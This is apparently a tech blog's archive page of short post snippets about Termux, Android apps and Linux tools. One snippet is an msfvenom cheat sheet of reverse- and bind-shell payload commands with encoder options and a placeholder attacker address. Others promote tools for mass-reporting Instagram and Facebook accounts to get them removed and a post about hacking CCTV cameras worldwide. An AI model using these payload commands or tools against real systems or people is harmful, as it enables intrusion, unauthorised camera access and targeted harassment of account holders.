Skip to main content

Posts

Showing posts from January, 2021

How to use Etoro trading API

How to use Etoro trading API Requirments: java 11 (JDK11) Google Chrome (tested on version 78) internet connection Build executable jar ./gradlew build Set your account credentials into Environment variables: LOGIN, PASSWORD export LOGIN=yourusername export PASSWORD=yourpassword Start API server java -jar build/libs/etoro-api-0.0.1-SNAPSHOT.jar Execute Requests All requests are in the postman collection under postman/ import it to the Postman and try it out. Using API server All requests are in the postman collection under postman/ import it to the Postman and try it out. In order to trade you have to add asset to watchlist first, then you can open or close positions with this asset. Your watchlist will be persisted locally in the watchlist.json if you start the server from the project folder. Swagger UI http://localhost:8088/etoro-api/swagger-ui.html API documentation http://localhost:8088/etor...

How to install OpenMTP 3.0

How to install OpenMTP 3.0 Introduction    Advanced Android File Transfer Application for macOS. Transferring files between macOS and Android or any other MTP devices has always been a nightmare. There are a few File Transfer MTP apps which are available online but most of them are either too expensive or come with bad UI/UX. The official "Android File Transfer" app for macOS from Google comes with bugs, innumerable limitations, some of which include - not being able to transfer files larger than 4GB, frequent disconnections, unable to rename the folders or files on the android/MTP devices. Most of the other apps available online uses either WiFi or ADB protocol to transfer the files, which is an extremely time-consuming process. Countless searches to find an app to solve these problems and failing to find one made me restless. So, I took the leap and ...

What’s new in OpenMTP v3.0?

What’s new in OpenMTP v3.0 OpenMTP is an advanced Android File Transfer application for macOS. OpenMTP is now available for use for all Samsung Devices. What’s new in OpenMTP v3.0? New and Super performant Kalam MTP kernel Much awaited Samsung phone support 5-6x faster file copy speed Dark Theme mode New App logo Drag and Drop files from the macOS Finder window New file icons Overall progress on the file transfer screen New 'Show directories first’ option New 'Single pane mode’ option New 'Move the Local Disk pane to the right side’ option New ' Auto device detection ' option Other UI optimisation and performance improvements Other features Plug and Play. No hassles, easy and instant connection. Connect via USB cable - Highest data transfer rates. Transfer multiple files which are larger than 4GB in one go. Select between Internal Memory and SD Card. Split p...

MSFVenom Payloads All Commands

 MSFVenom Payloads All Commands # PHP reverse shell   msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php # Java WAR reverse shell   msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war # Linux bind shell   msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai # Linux FreeBSD reverse shell   msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf # Linux C reverse shell   msfvenom  -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c # Windows non staged reverse shell   msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe # Windows Staged (Meterpreter) reverse shell   msfvenom -p windows/meterpret...

WhatsApp will stop working iPhone and Android from 2021

WhatsApp will stop working iPhone and Android from 2021 Very soon the most popular messaging app will stop working on several smartphones, check what they are and take your precautions. WhatsApp will stop working on some Android and iPhone smartphones, due to updates to both operating systems and applications to keep up to date. That is why we tell you which devices will be incompatible with the messaging app from 2021. These iPhones run out of WhatsApp For starters, all iPhones that do not have at least iOS 9 will be left without the app. That is, all iPhone 4 and earlier models. Models 4S, 5, 5S, 5C, 6 and 6S will need to update their operating system to iOS 9 or later to continue using WhatsApp. In the case of the 6S, 6S Plus and the first generation iPhone SE, they are the last to support the latest version of the syst...

Linux Academy By WhiteHat

Linux Academy By WhiteHat 1.Linux Essentials Certification 2. Google Cloud Platform Essentials 3. Linux+ and LPIC-1. System Administrator - Exam 101 4. Learning Python 2.7 Development 5. Vim - The improved Editor 6. Git Quick Start 7. Jenkins Quick Start 8. Bootloading with GRUB 9. Google Cloud Platform for the AWS User 10. Linux+ and LPIC-1. System Administrator - Exam 102 11. Google Container Engine 12. Linux Academy Red Hat Certified Systems Administrator Prep Course 13. Deploying Microservices with Puppet and Containers 14. PPT-204. Puppet 204 - System Administration Using Puppet 15. Certified Jenkins Engineer (CJE) 16. Linux+ LPIC Level 1 Exam 2 17. Linux+ LPIC Level 1 Exam 1 18. Nagios Certified Professional 19. Introduction to Linux with Ubuntu 14 Desktop 20. Mastering the Linux Command Line 21. How to Get a Linux Job 22. Introduction to Android Development 24. In...

Step-by-Step Guide: Recovering a Broken Environment in Termux Without Root Access

How to recover a broken environment in Termux NO ROOT   Hii Guys Welcome back you my new post in this post i will show you how to recover a broken environment in Termux  Let's go  What is the problem U can see If Termux exits immediately after launch or cannot properly start shell, it is likely that your environment is broken. The cause of which is most likely a a fatal error in a dotfile read by your shell, which causes it to immediately exit. To recover from such errors Termux provides a Failsafe Session .    if you got like this problem so need follow this steps 1.  Force STOP Termux application.  Force STOP Termux application 2. Either long-press the Termux launcher icon and then press " failsafe " (only works on recent android versions) or long-press the " new session " button in the left drawer inside th...

Popular posts from this blog

[Apk Setup] Alpine-term App | without using termux

Install and Setup Alpine Term in Android App Welcome to the world of terminal and Linux environment on your Android device! 📲 In this blog post, we will guide you through the installation and setup process of Alpine Term, an amazing application that brings the power of Alpine Linux to your fingertips. Let's get started! 🚀 What is Alpine Term App? 🏔️ Alpine Term is a terminal and Linux environment application for Android. It utilizes Alpine Linux, running inside a headless x86_64 machine emulated with QEMU. The interaction with the operating system is done through terminals attached to the serial consoles of the virtual machine. This allows you to run commands, execute scripts, and experience a Linux environment on your Android device. System Requirements 📋 To install and use Alpine Term, make sure your device meets the following requirements: 📱 AArch64-based device. 🆙 Android 7.0 or higher. 💾 At least 500 MB of free space on the internal storage. 🌐 ...

Cloudflared in Termux to Create tunnels, Port Forwding

Step-by-Step Guide: Installing Cloudflared in Termux for Android (Alternative to ngrok) | 2024" J Link updated https://github.com/rajbhx/cloudflared-termux What is cloudflare Cloudflare, Inc. is an American content delivery network and DDoS mitigation company, founded in 2010. It acts as a reverse proxy between a website's visitor and the Cloudflare customer's hosting provider. Its headquarters are in San Francisco, California Usages cloudflared -url [localhost]:port_number] example : cloudflared -url localhost:8000 cloudflared tunnel localhost:[port_number] Installation Make sure your Termux app updated The commands you provided are the steps to install Cloudflared in Termux using the `rajbhx/cloudflared-termux` repository. Here's a breakdown of each command: 1. Update and upgrade packages:    ```    pkg update && pkg upgrade && pkg install git    ``` 2...

How to install and setup vShell in android app |कैसे इनस्टॉल करें

How to install and setup android vShell(Virtual Shell) app (no root) कैसे इनस्टॉल करें YouTube video link What is Android-vShell app vShell is a  virtual shell environment application  for the Android OS. A virtual Linux shell environment application for Android OS. Runs Alpine Linux in QEMU system emulator.  It provides a virtual machine running small Linux distribution ready for the use out-of-box. Application implements my view on how Linux terminal environments can look like on Android OS. As operating system security is getting more and more hardened over time (which is good btw), it become impossible to abuse design flaws such as executable user data to run Linux native executables. Ability to...

My Termux | How to install Lazymux in Termux #rajbhx

My Termux | How to install Lazymux in Termux Lazymux t00ls !nstaller !s very easy t0 use, 0nly pr0v!ded f0r lazy Termux users, just k!dd!ng. Lazymux !s a t00l that !s spec!ally made f0r Termux user wh!ch pr0v!des a l0t 0f t00l ma!nly used t00ls !n Termux, Lazymux !nstall any 0f the g!ven t00ls pr0v!ded by !t fr0m !tself w!th just 0ne cl!ck, and Lazymux always get updated.  What !s Python 3?   My Termux | How to install Lazymux in Termux @rajbhx How to Install Oh My Zsh How to download copyright free GAME PLAY CODM/PUBG/BGMI/FreeFire Call of duty mobile 60fps   How to install FacebookToolkit in Termux + linux + windows 10/11 Download any video with termux using youtube-dl | #rajbhx HOw to install Raspbian 9 (Stretch) in Termux #rajbhx On Decembe...

🚀 The 2024 Java Developer Roadmap [UPDATED] 🚀

🚀 The 2024 Java Developer Roadmap [UPDATED] 🚀 Hello aspiring Java developers! 🌟 Welcome to the 2023 Java Developer Roadmap, a comprehensive guide designed to help you navigate your journey towards becoming a proficient Java professional. Whether you're just starting or looking to level up your Java skills, this roadmap will provide you with a clear path to success in the Java ecosystem. 🎉 Introduction Java, as a robust and versatile programming language, continues to be a leading choice for building enterprise-level applications, web services, mobile apps, and more. As we step into 2023, the Java landscape evolves, presenting exciting opportunities for developers like you. This updated Java Developer Roadmap encompasses years of expertise and industry insights to outline the key skills, tools, frameworks, libraries, and APIs that you should master to excel as a Java developer in 2023. 🔍 The Essentials Before diving into Java-specific to...

How to extract Details from any mobile number Using termux | rajbhx

How to extract Details from any mobile number | termux | jarvisstaraq.blogspot.com What is truecallerjs Truecallerjs : A simple package to search phone number details.this tool also work in android and Termux app jarvisstaraq.blogspot.com Requirements Android phone Termux Proper valid Mobile Number(Phone number verification for truecaller) Truecaller InstallationId jarvisstaraq.blogspot.com Installation in Termux Installing Node.js, Git, and Wget in Termux:  To install Node.js, Git, and Wget in Termux, follow these steps: 1. Open your Termux app. 2. Run the following command to update the package lists:     ```    pkg update    ``` 3. Next, install Node.js using the following command:    ```    pkg install nodejs    ``` 4. Install Git using the command:    ```    pkg install git    ``` 5. Lastly...

How to install | instagram reporting 2 tool termux by jarvisstaraq

How to install | instagram reporting 2 tool termux by jarvisstaraq Assuming the client truly breaks the instagram rule then their is more opportunities to get prohibited. Instagram limits the reports per unit time, apparatus will auto quit revealing later arrived at limit at very nearly 40 reports. Shows "Detailed Succesfully" later Each Request. You can Report target again later some time (later 2-3 min). Use IP of same district for high effecivity. In the event that you enter invalid username it will in any case send report demand. Assuming that you getting mistake on utilizing intermediaries then, at that point, don't. Requirements Python3 Or Above  Need to install git in linux or termux Download GIT Usage Instagram mass reporter [ TERMUX ]  How to delete Instagram Account by mrwn007 Report tool Termux   [ TERMUX ]

How to delete Instagram Account by mrwn007 Report tool Termux

How to delete Instagram Account by mrwn007 Report tool Termux(Android) What is termux Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically - additional packages are available using the APT package manager. mrwn007 / 007spam-BOT Check out new updated repository Instagram mass reporter [ TERMUX ] Instagram Reporting 2 [ TERMUX ] Instagram delete new method by crevils [Termux] Why this tool not working:( Because this tool author removed all files and reposiory also just because this tool no working @__@ Installation  pkg install git pkg install python git clone https://github.com/mrwn007/007spam-BOT.git cd 007spam-BOT python3 -m pip install requests python3 bot.py this repo is dead for normal users to report in Ins...

How to install & use report-fb-account-termux tool in termux

report-fb-account-termux   [+]  Disclaimer : This tool is only for educational purpose. The developer is not responsible for any abuse of it.   [+] Installation apt update && apt upgrade -y apt install git python -y git clone https://github.com/jarvisstar/report-fb-account-termux.git cd autoreport python3 ar.py Or, Use Single Command apt install git python -y && git clone https://github.com/KasRoudra/autoreport && cd autoreport && python3 ar.py Screenshots:   Usage: Search "findfbid" in google to get victim's profile link. Such as Website1 , Website2 , Website3 , Website4 . Enter the victim's facebook profile link in the website, generate and copy the numeric id in clipboard. Run the script and enter or paste that id when asked! [+] Note: AUTOREPORT DOES NOT DISABLE ACCOUNT UNLESS THERE IS SPECIFIC POST(S)...

How to Hack CCTV Cameras with Cam-dumper on Linux, Termux, and Windows

Cam-dumper is a written tool in the language of Python program for hacking CCTV cameras that can access cameras in 20 countries   installation   in Linux, Windows, and Termux,  Linux # 💾 Install Python 3.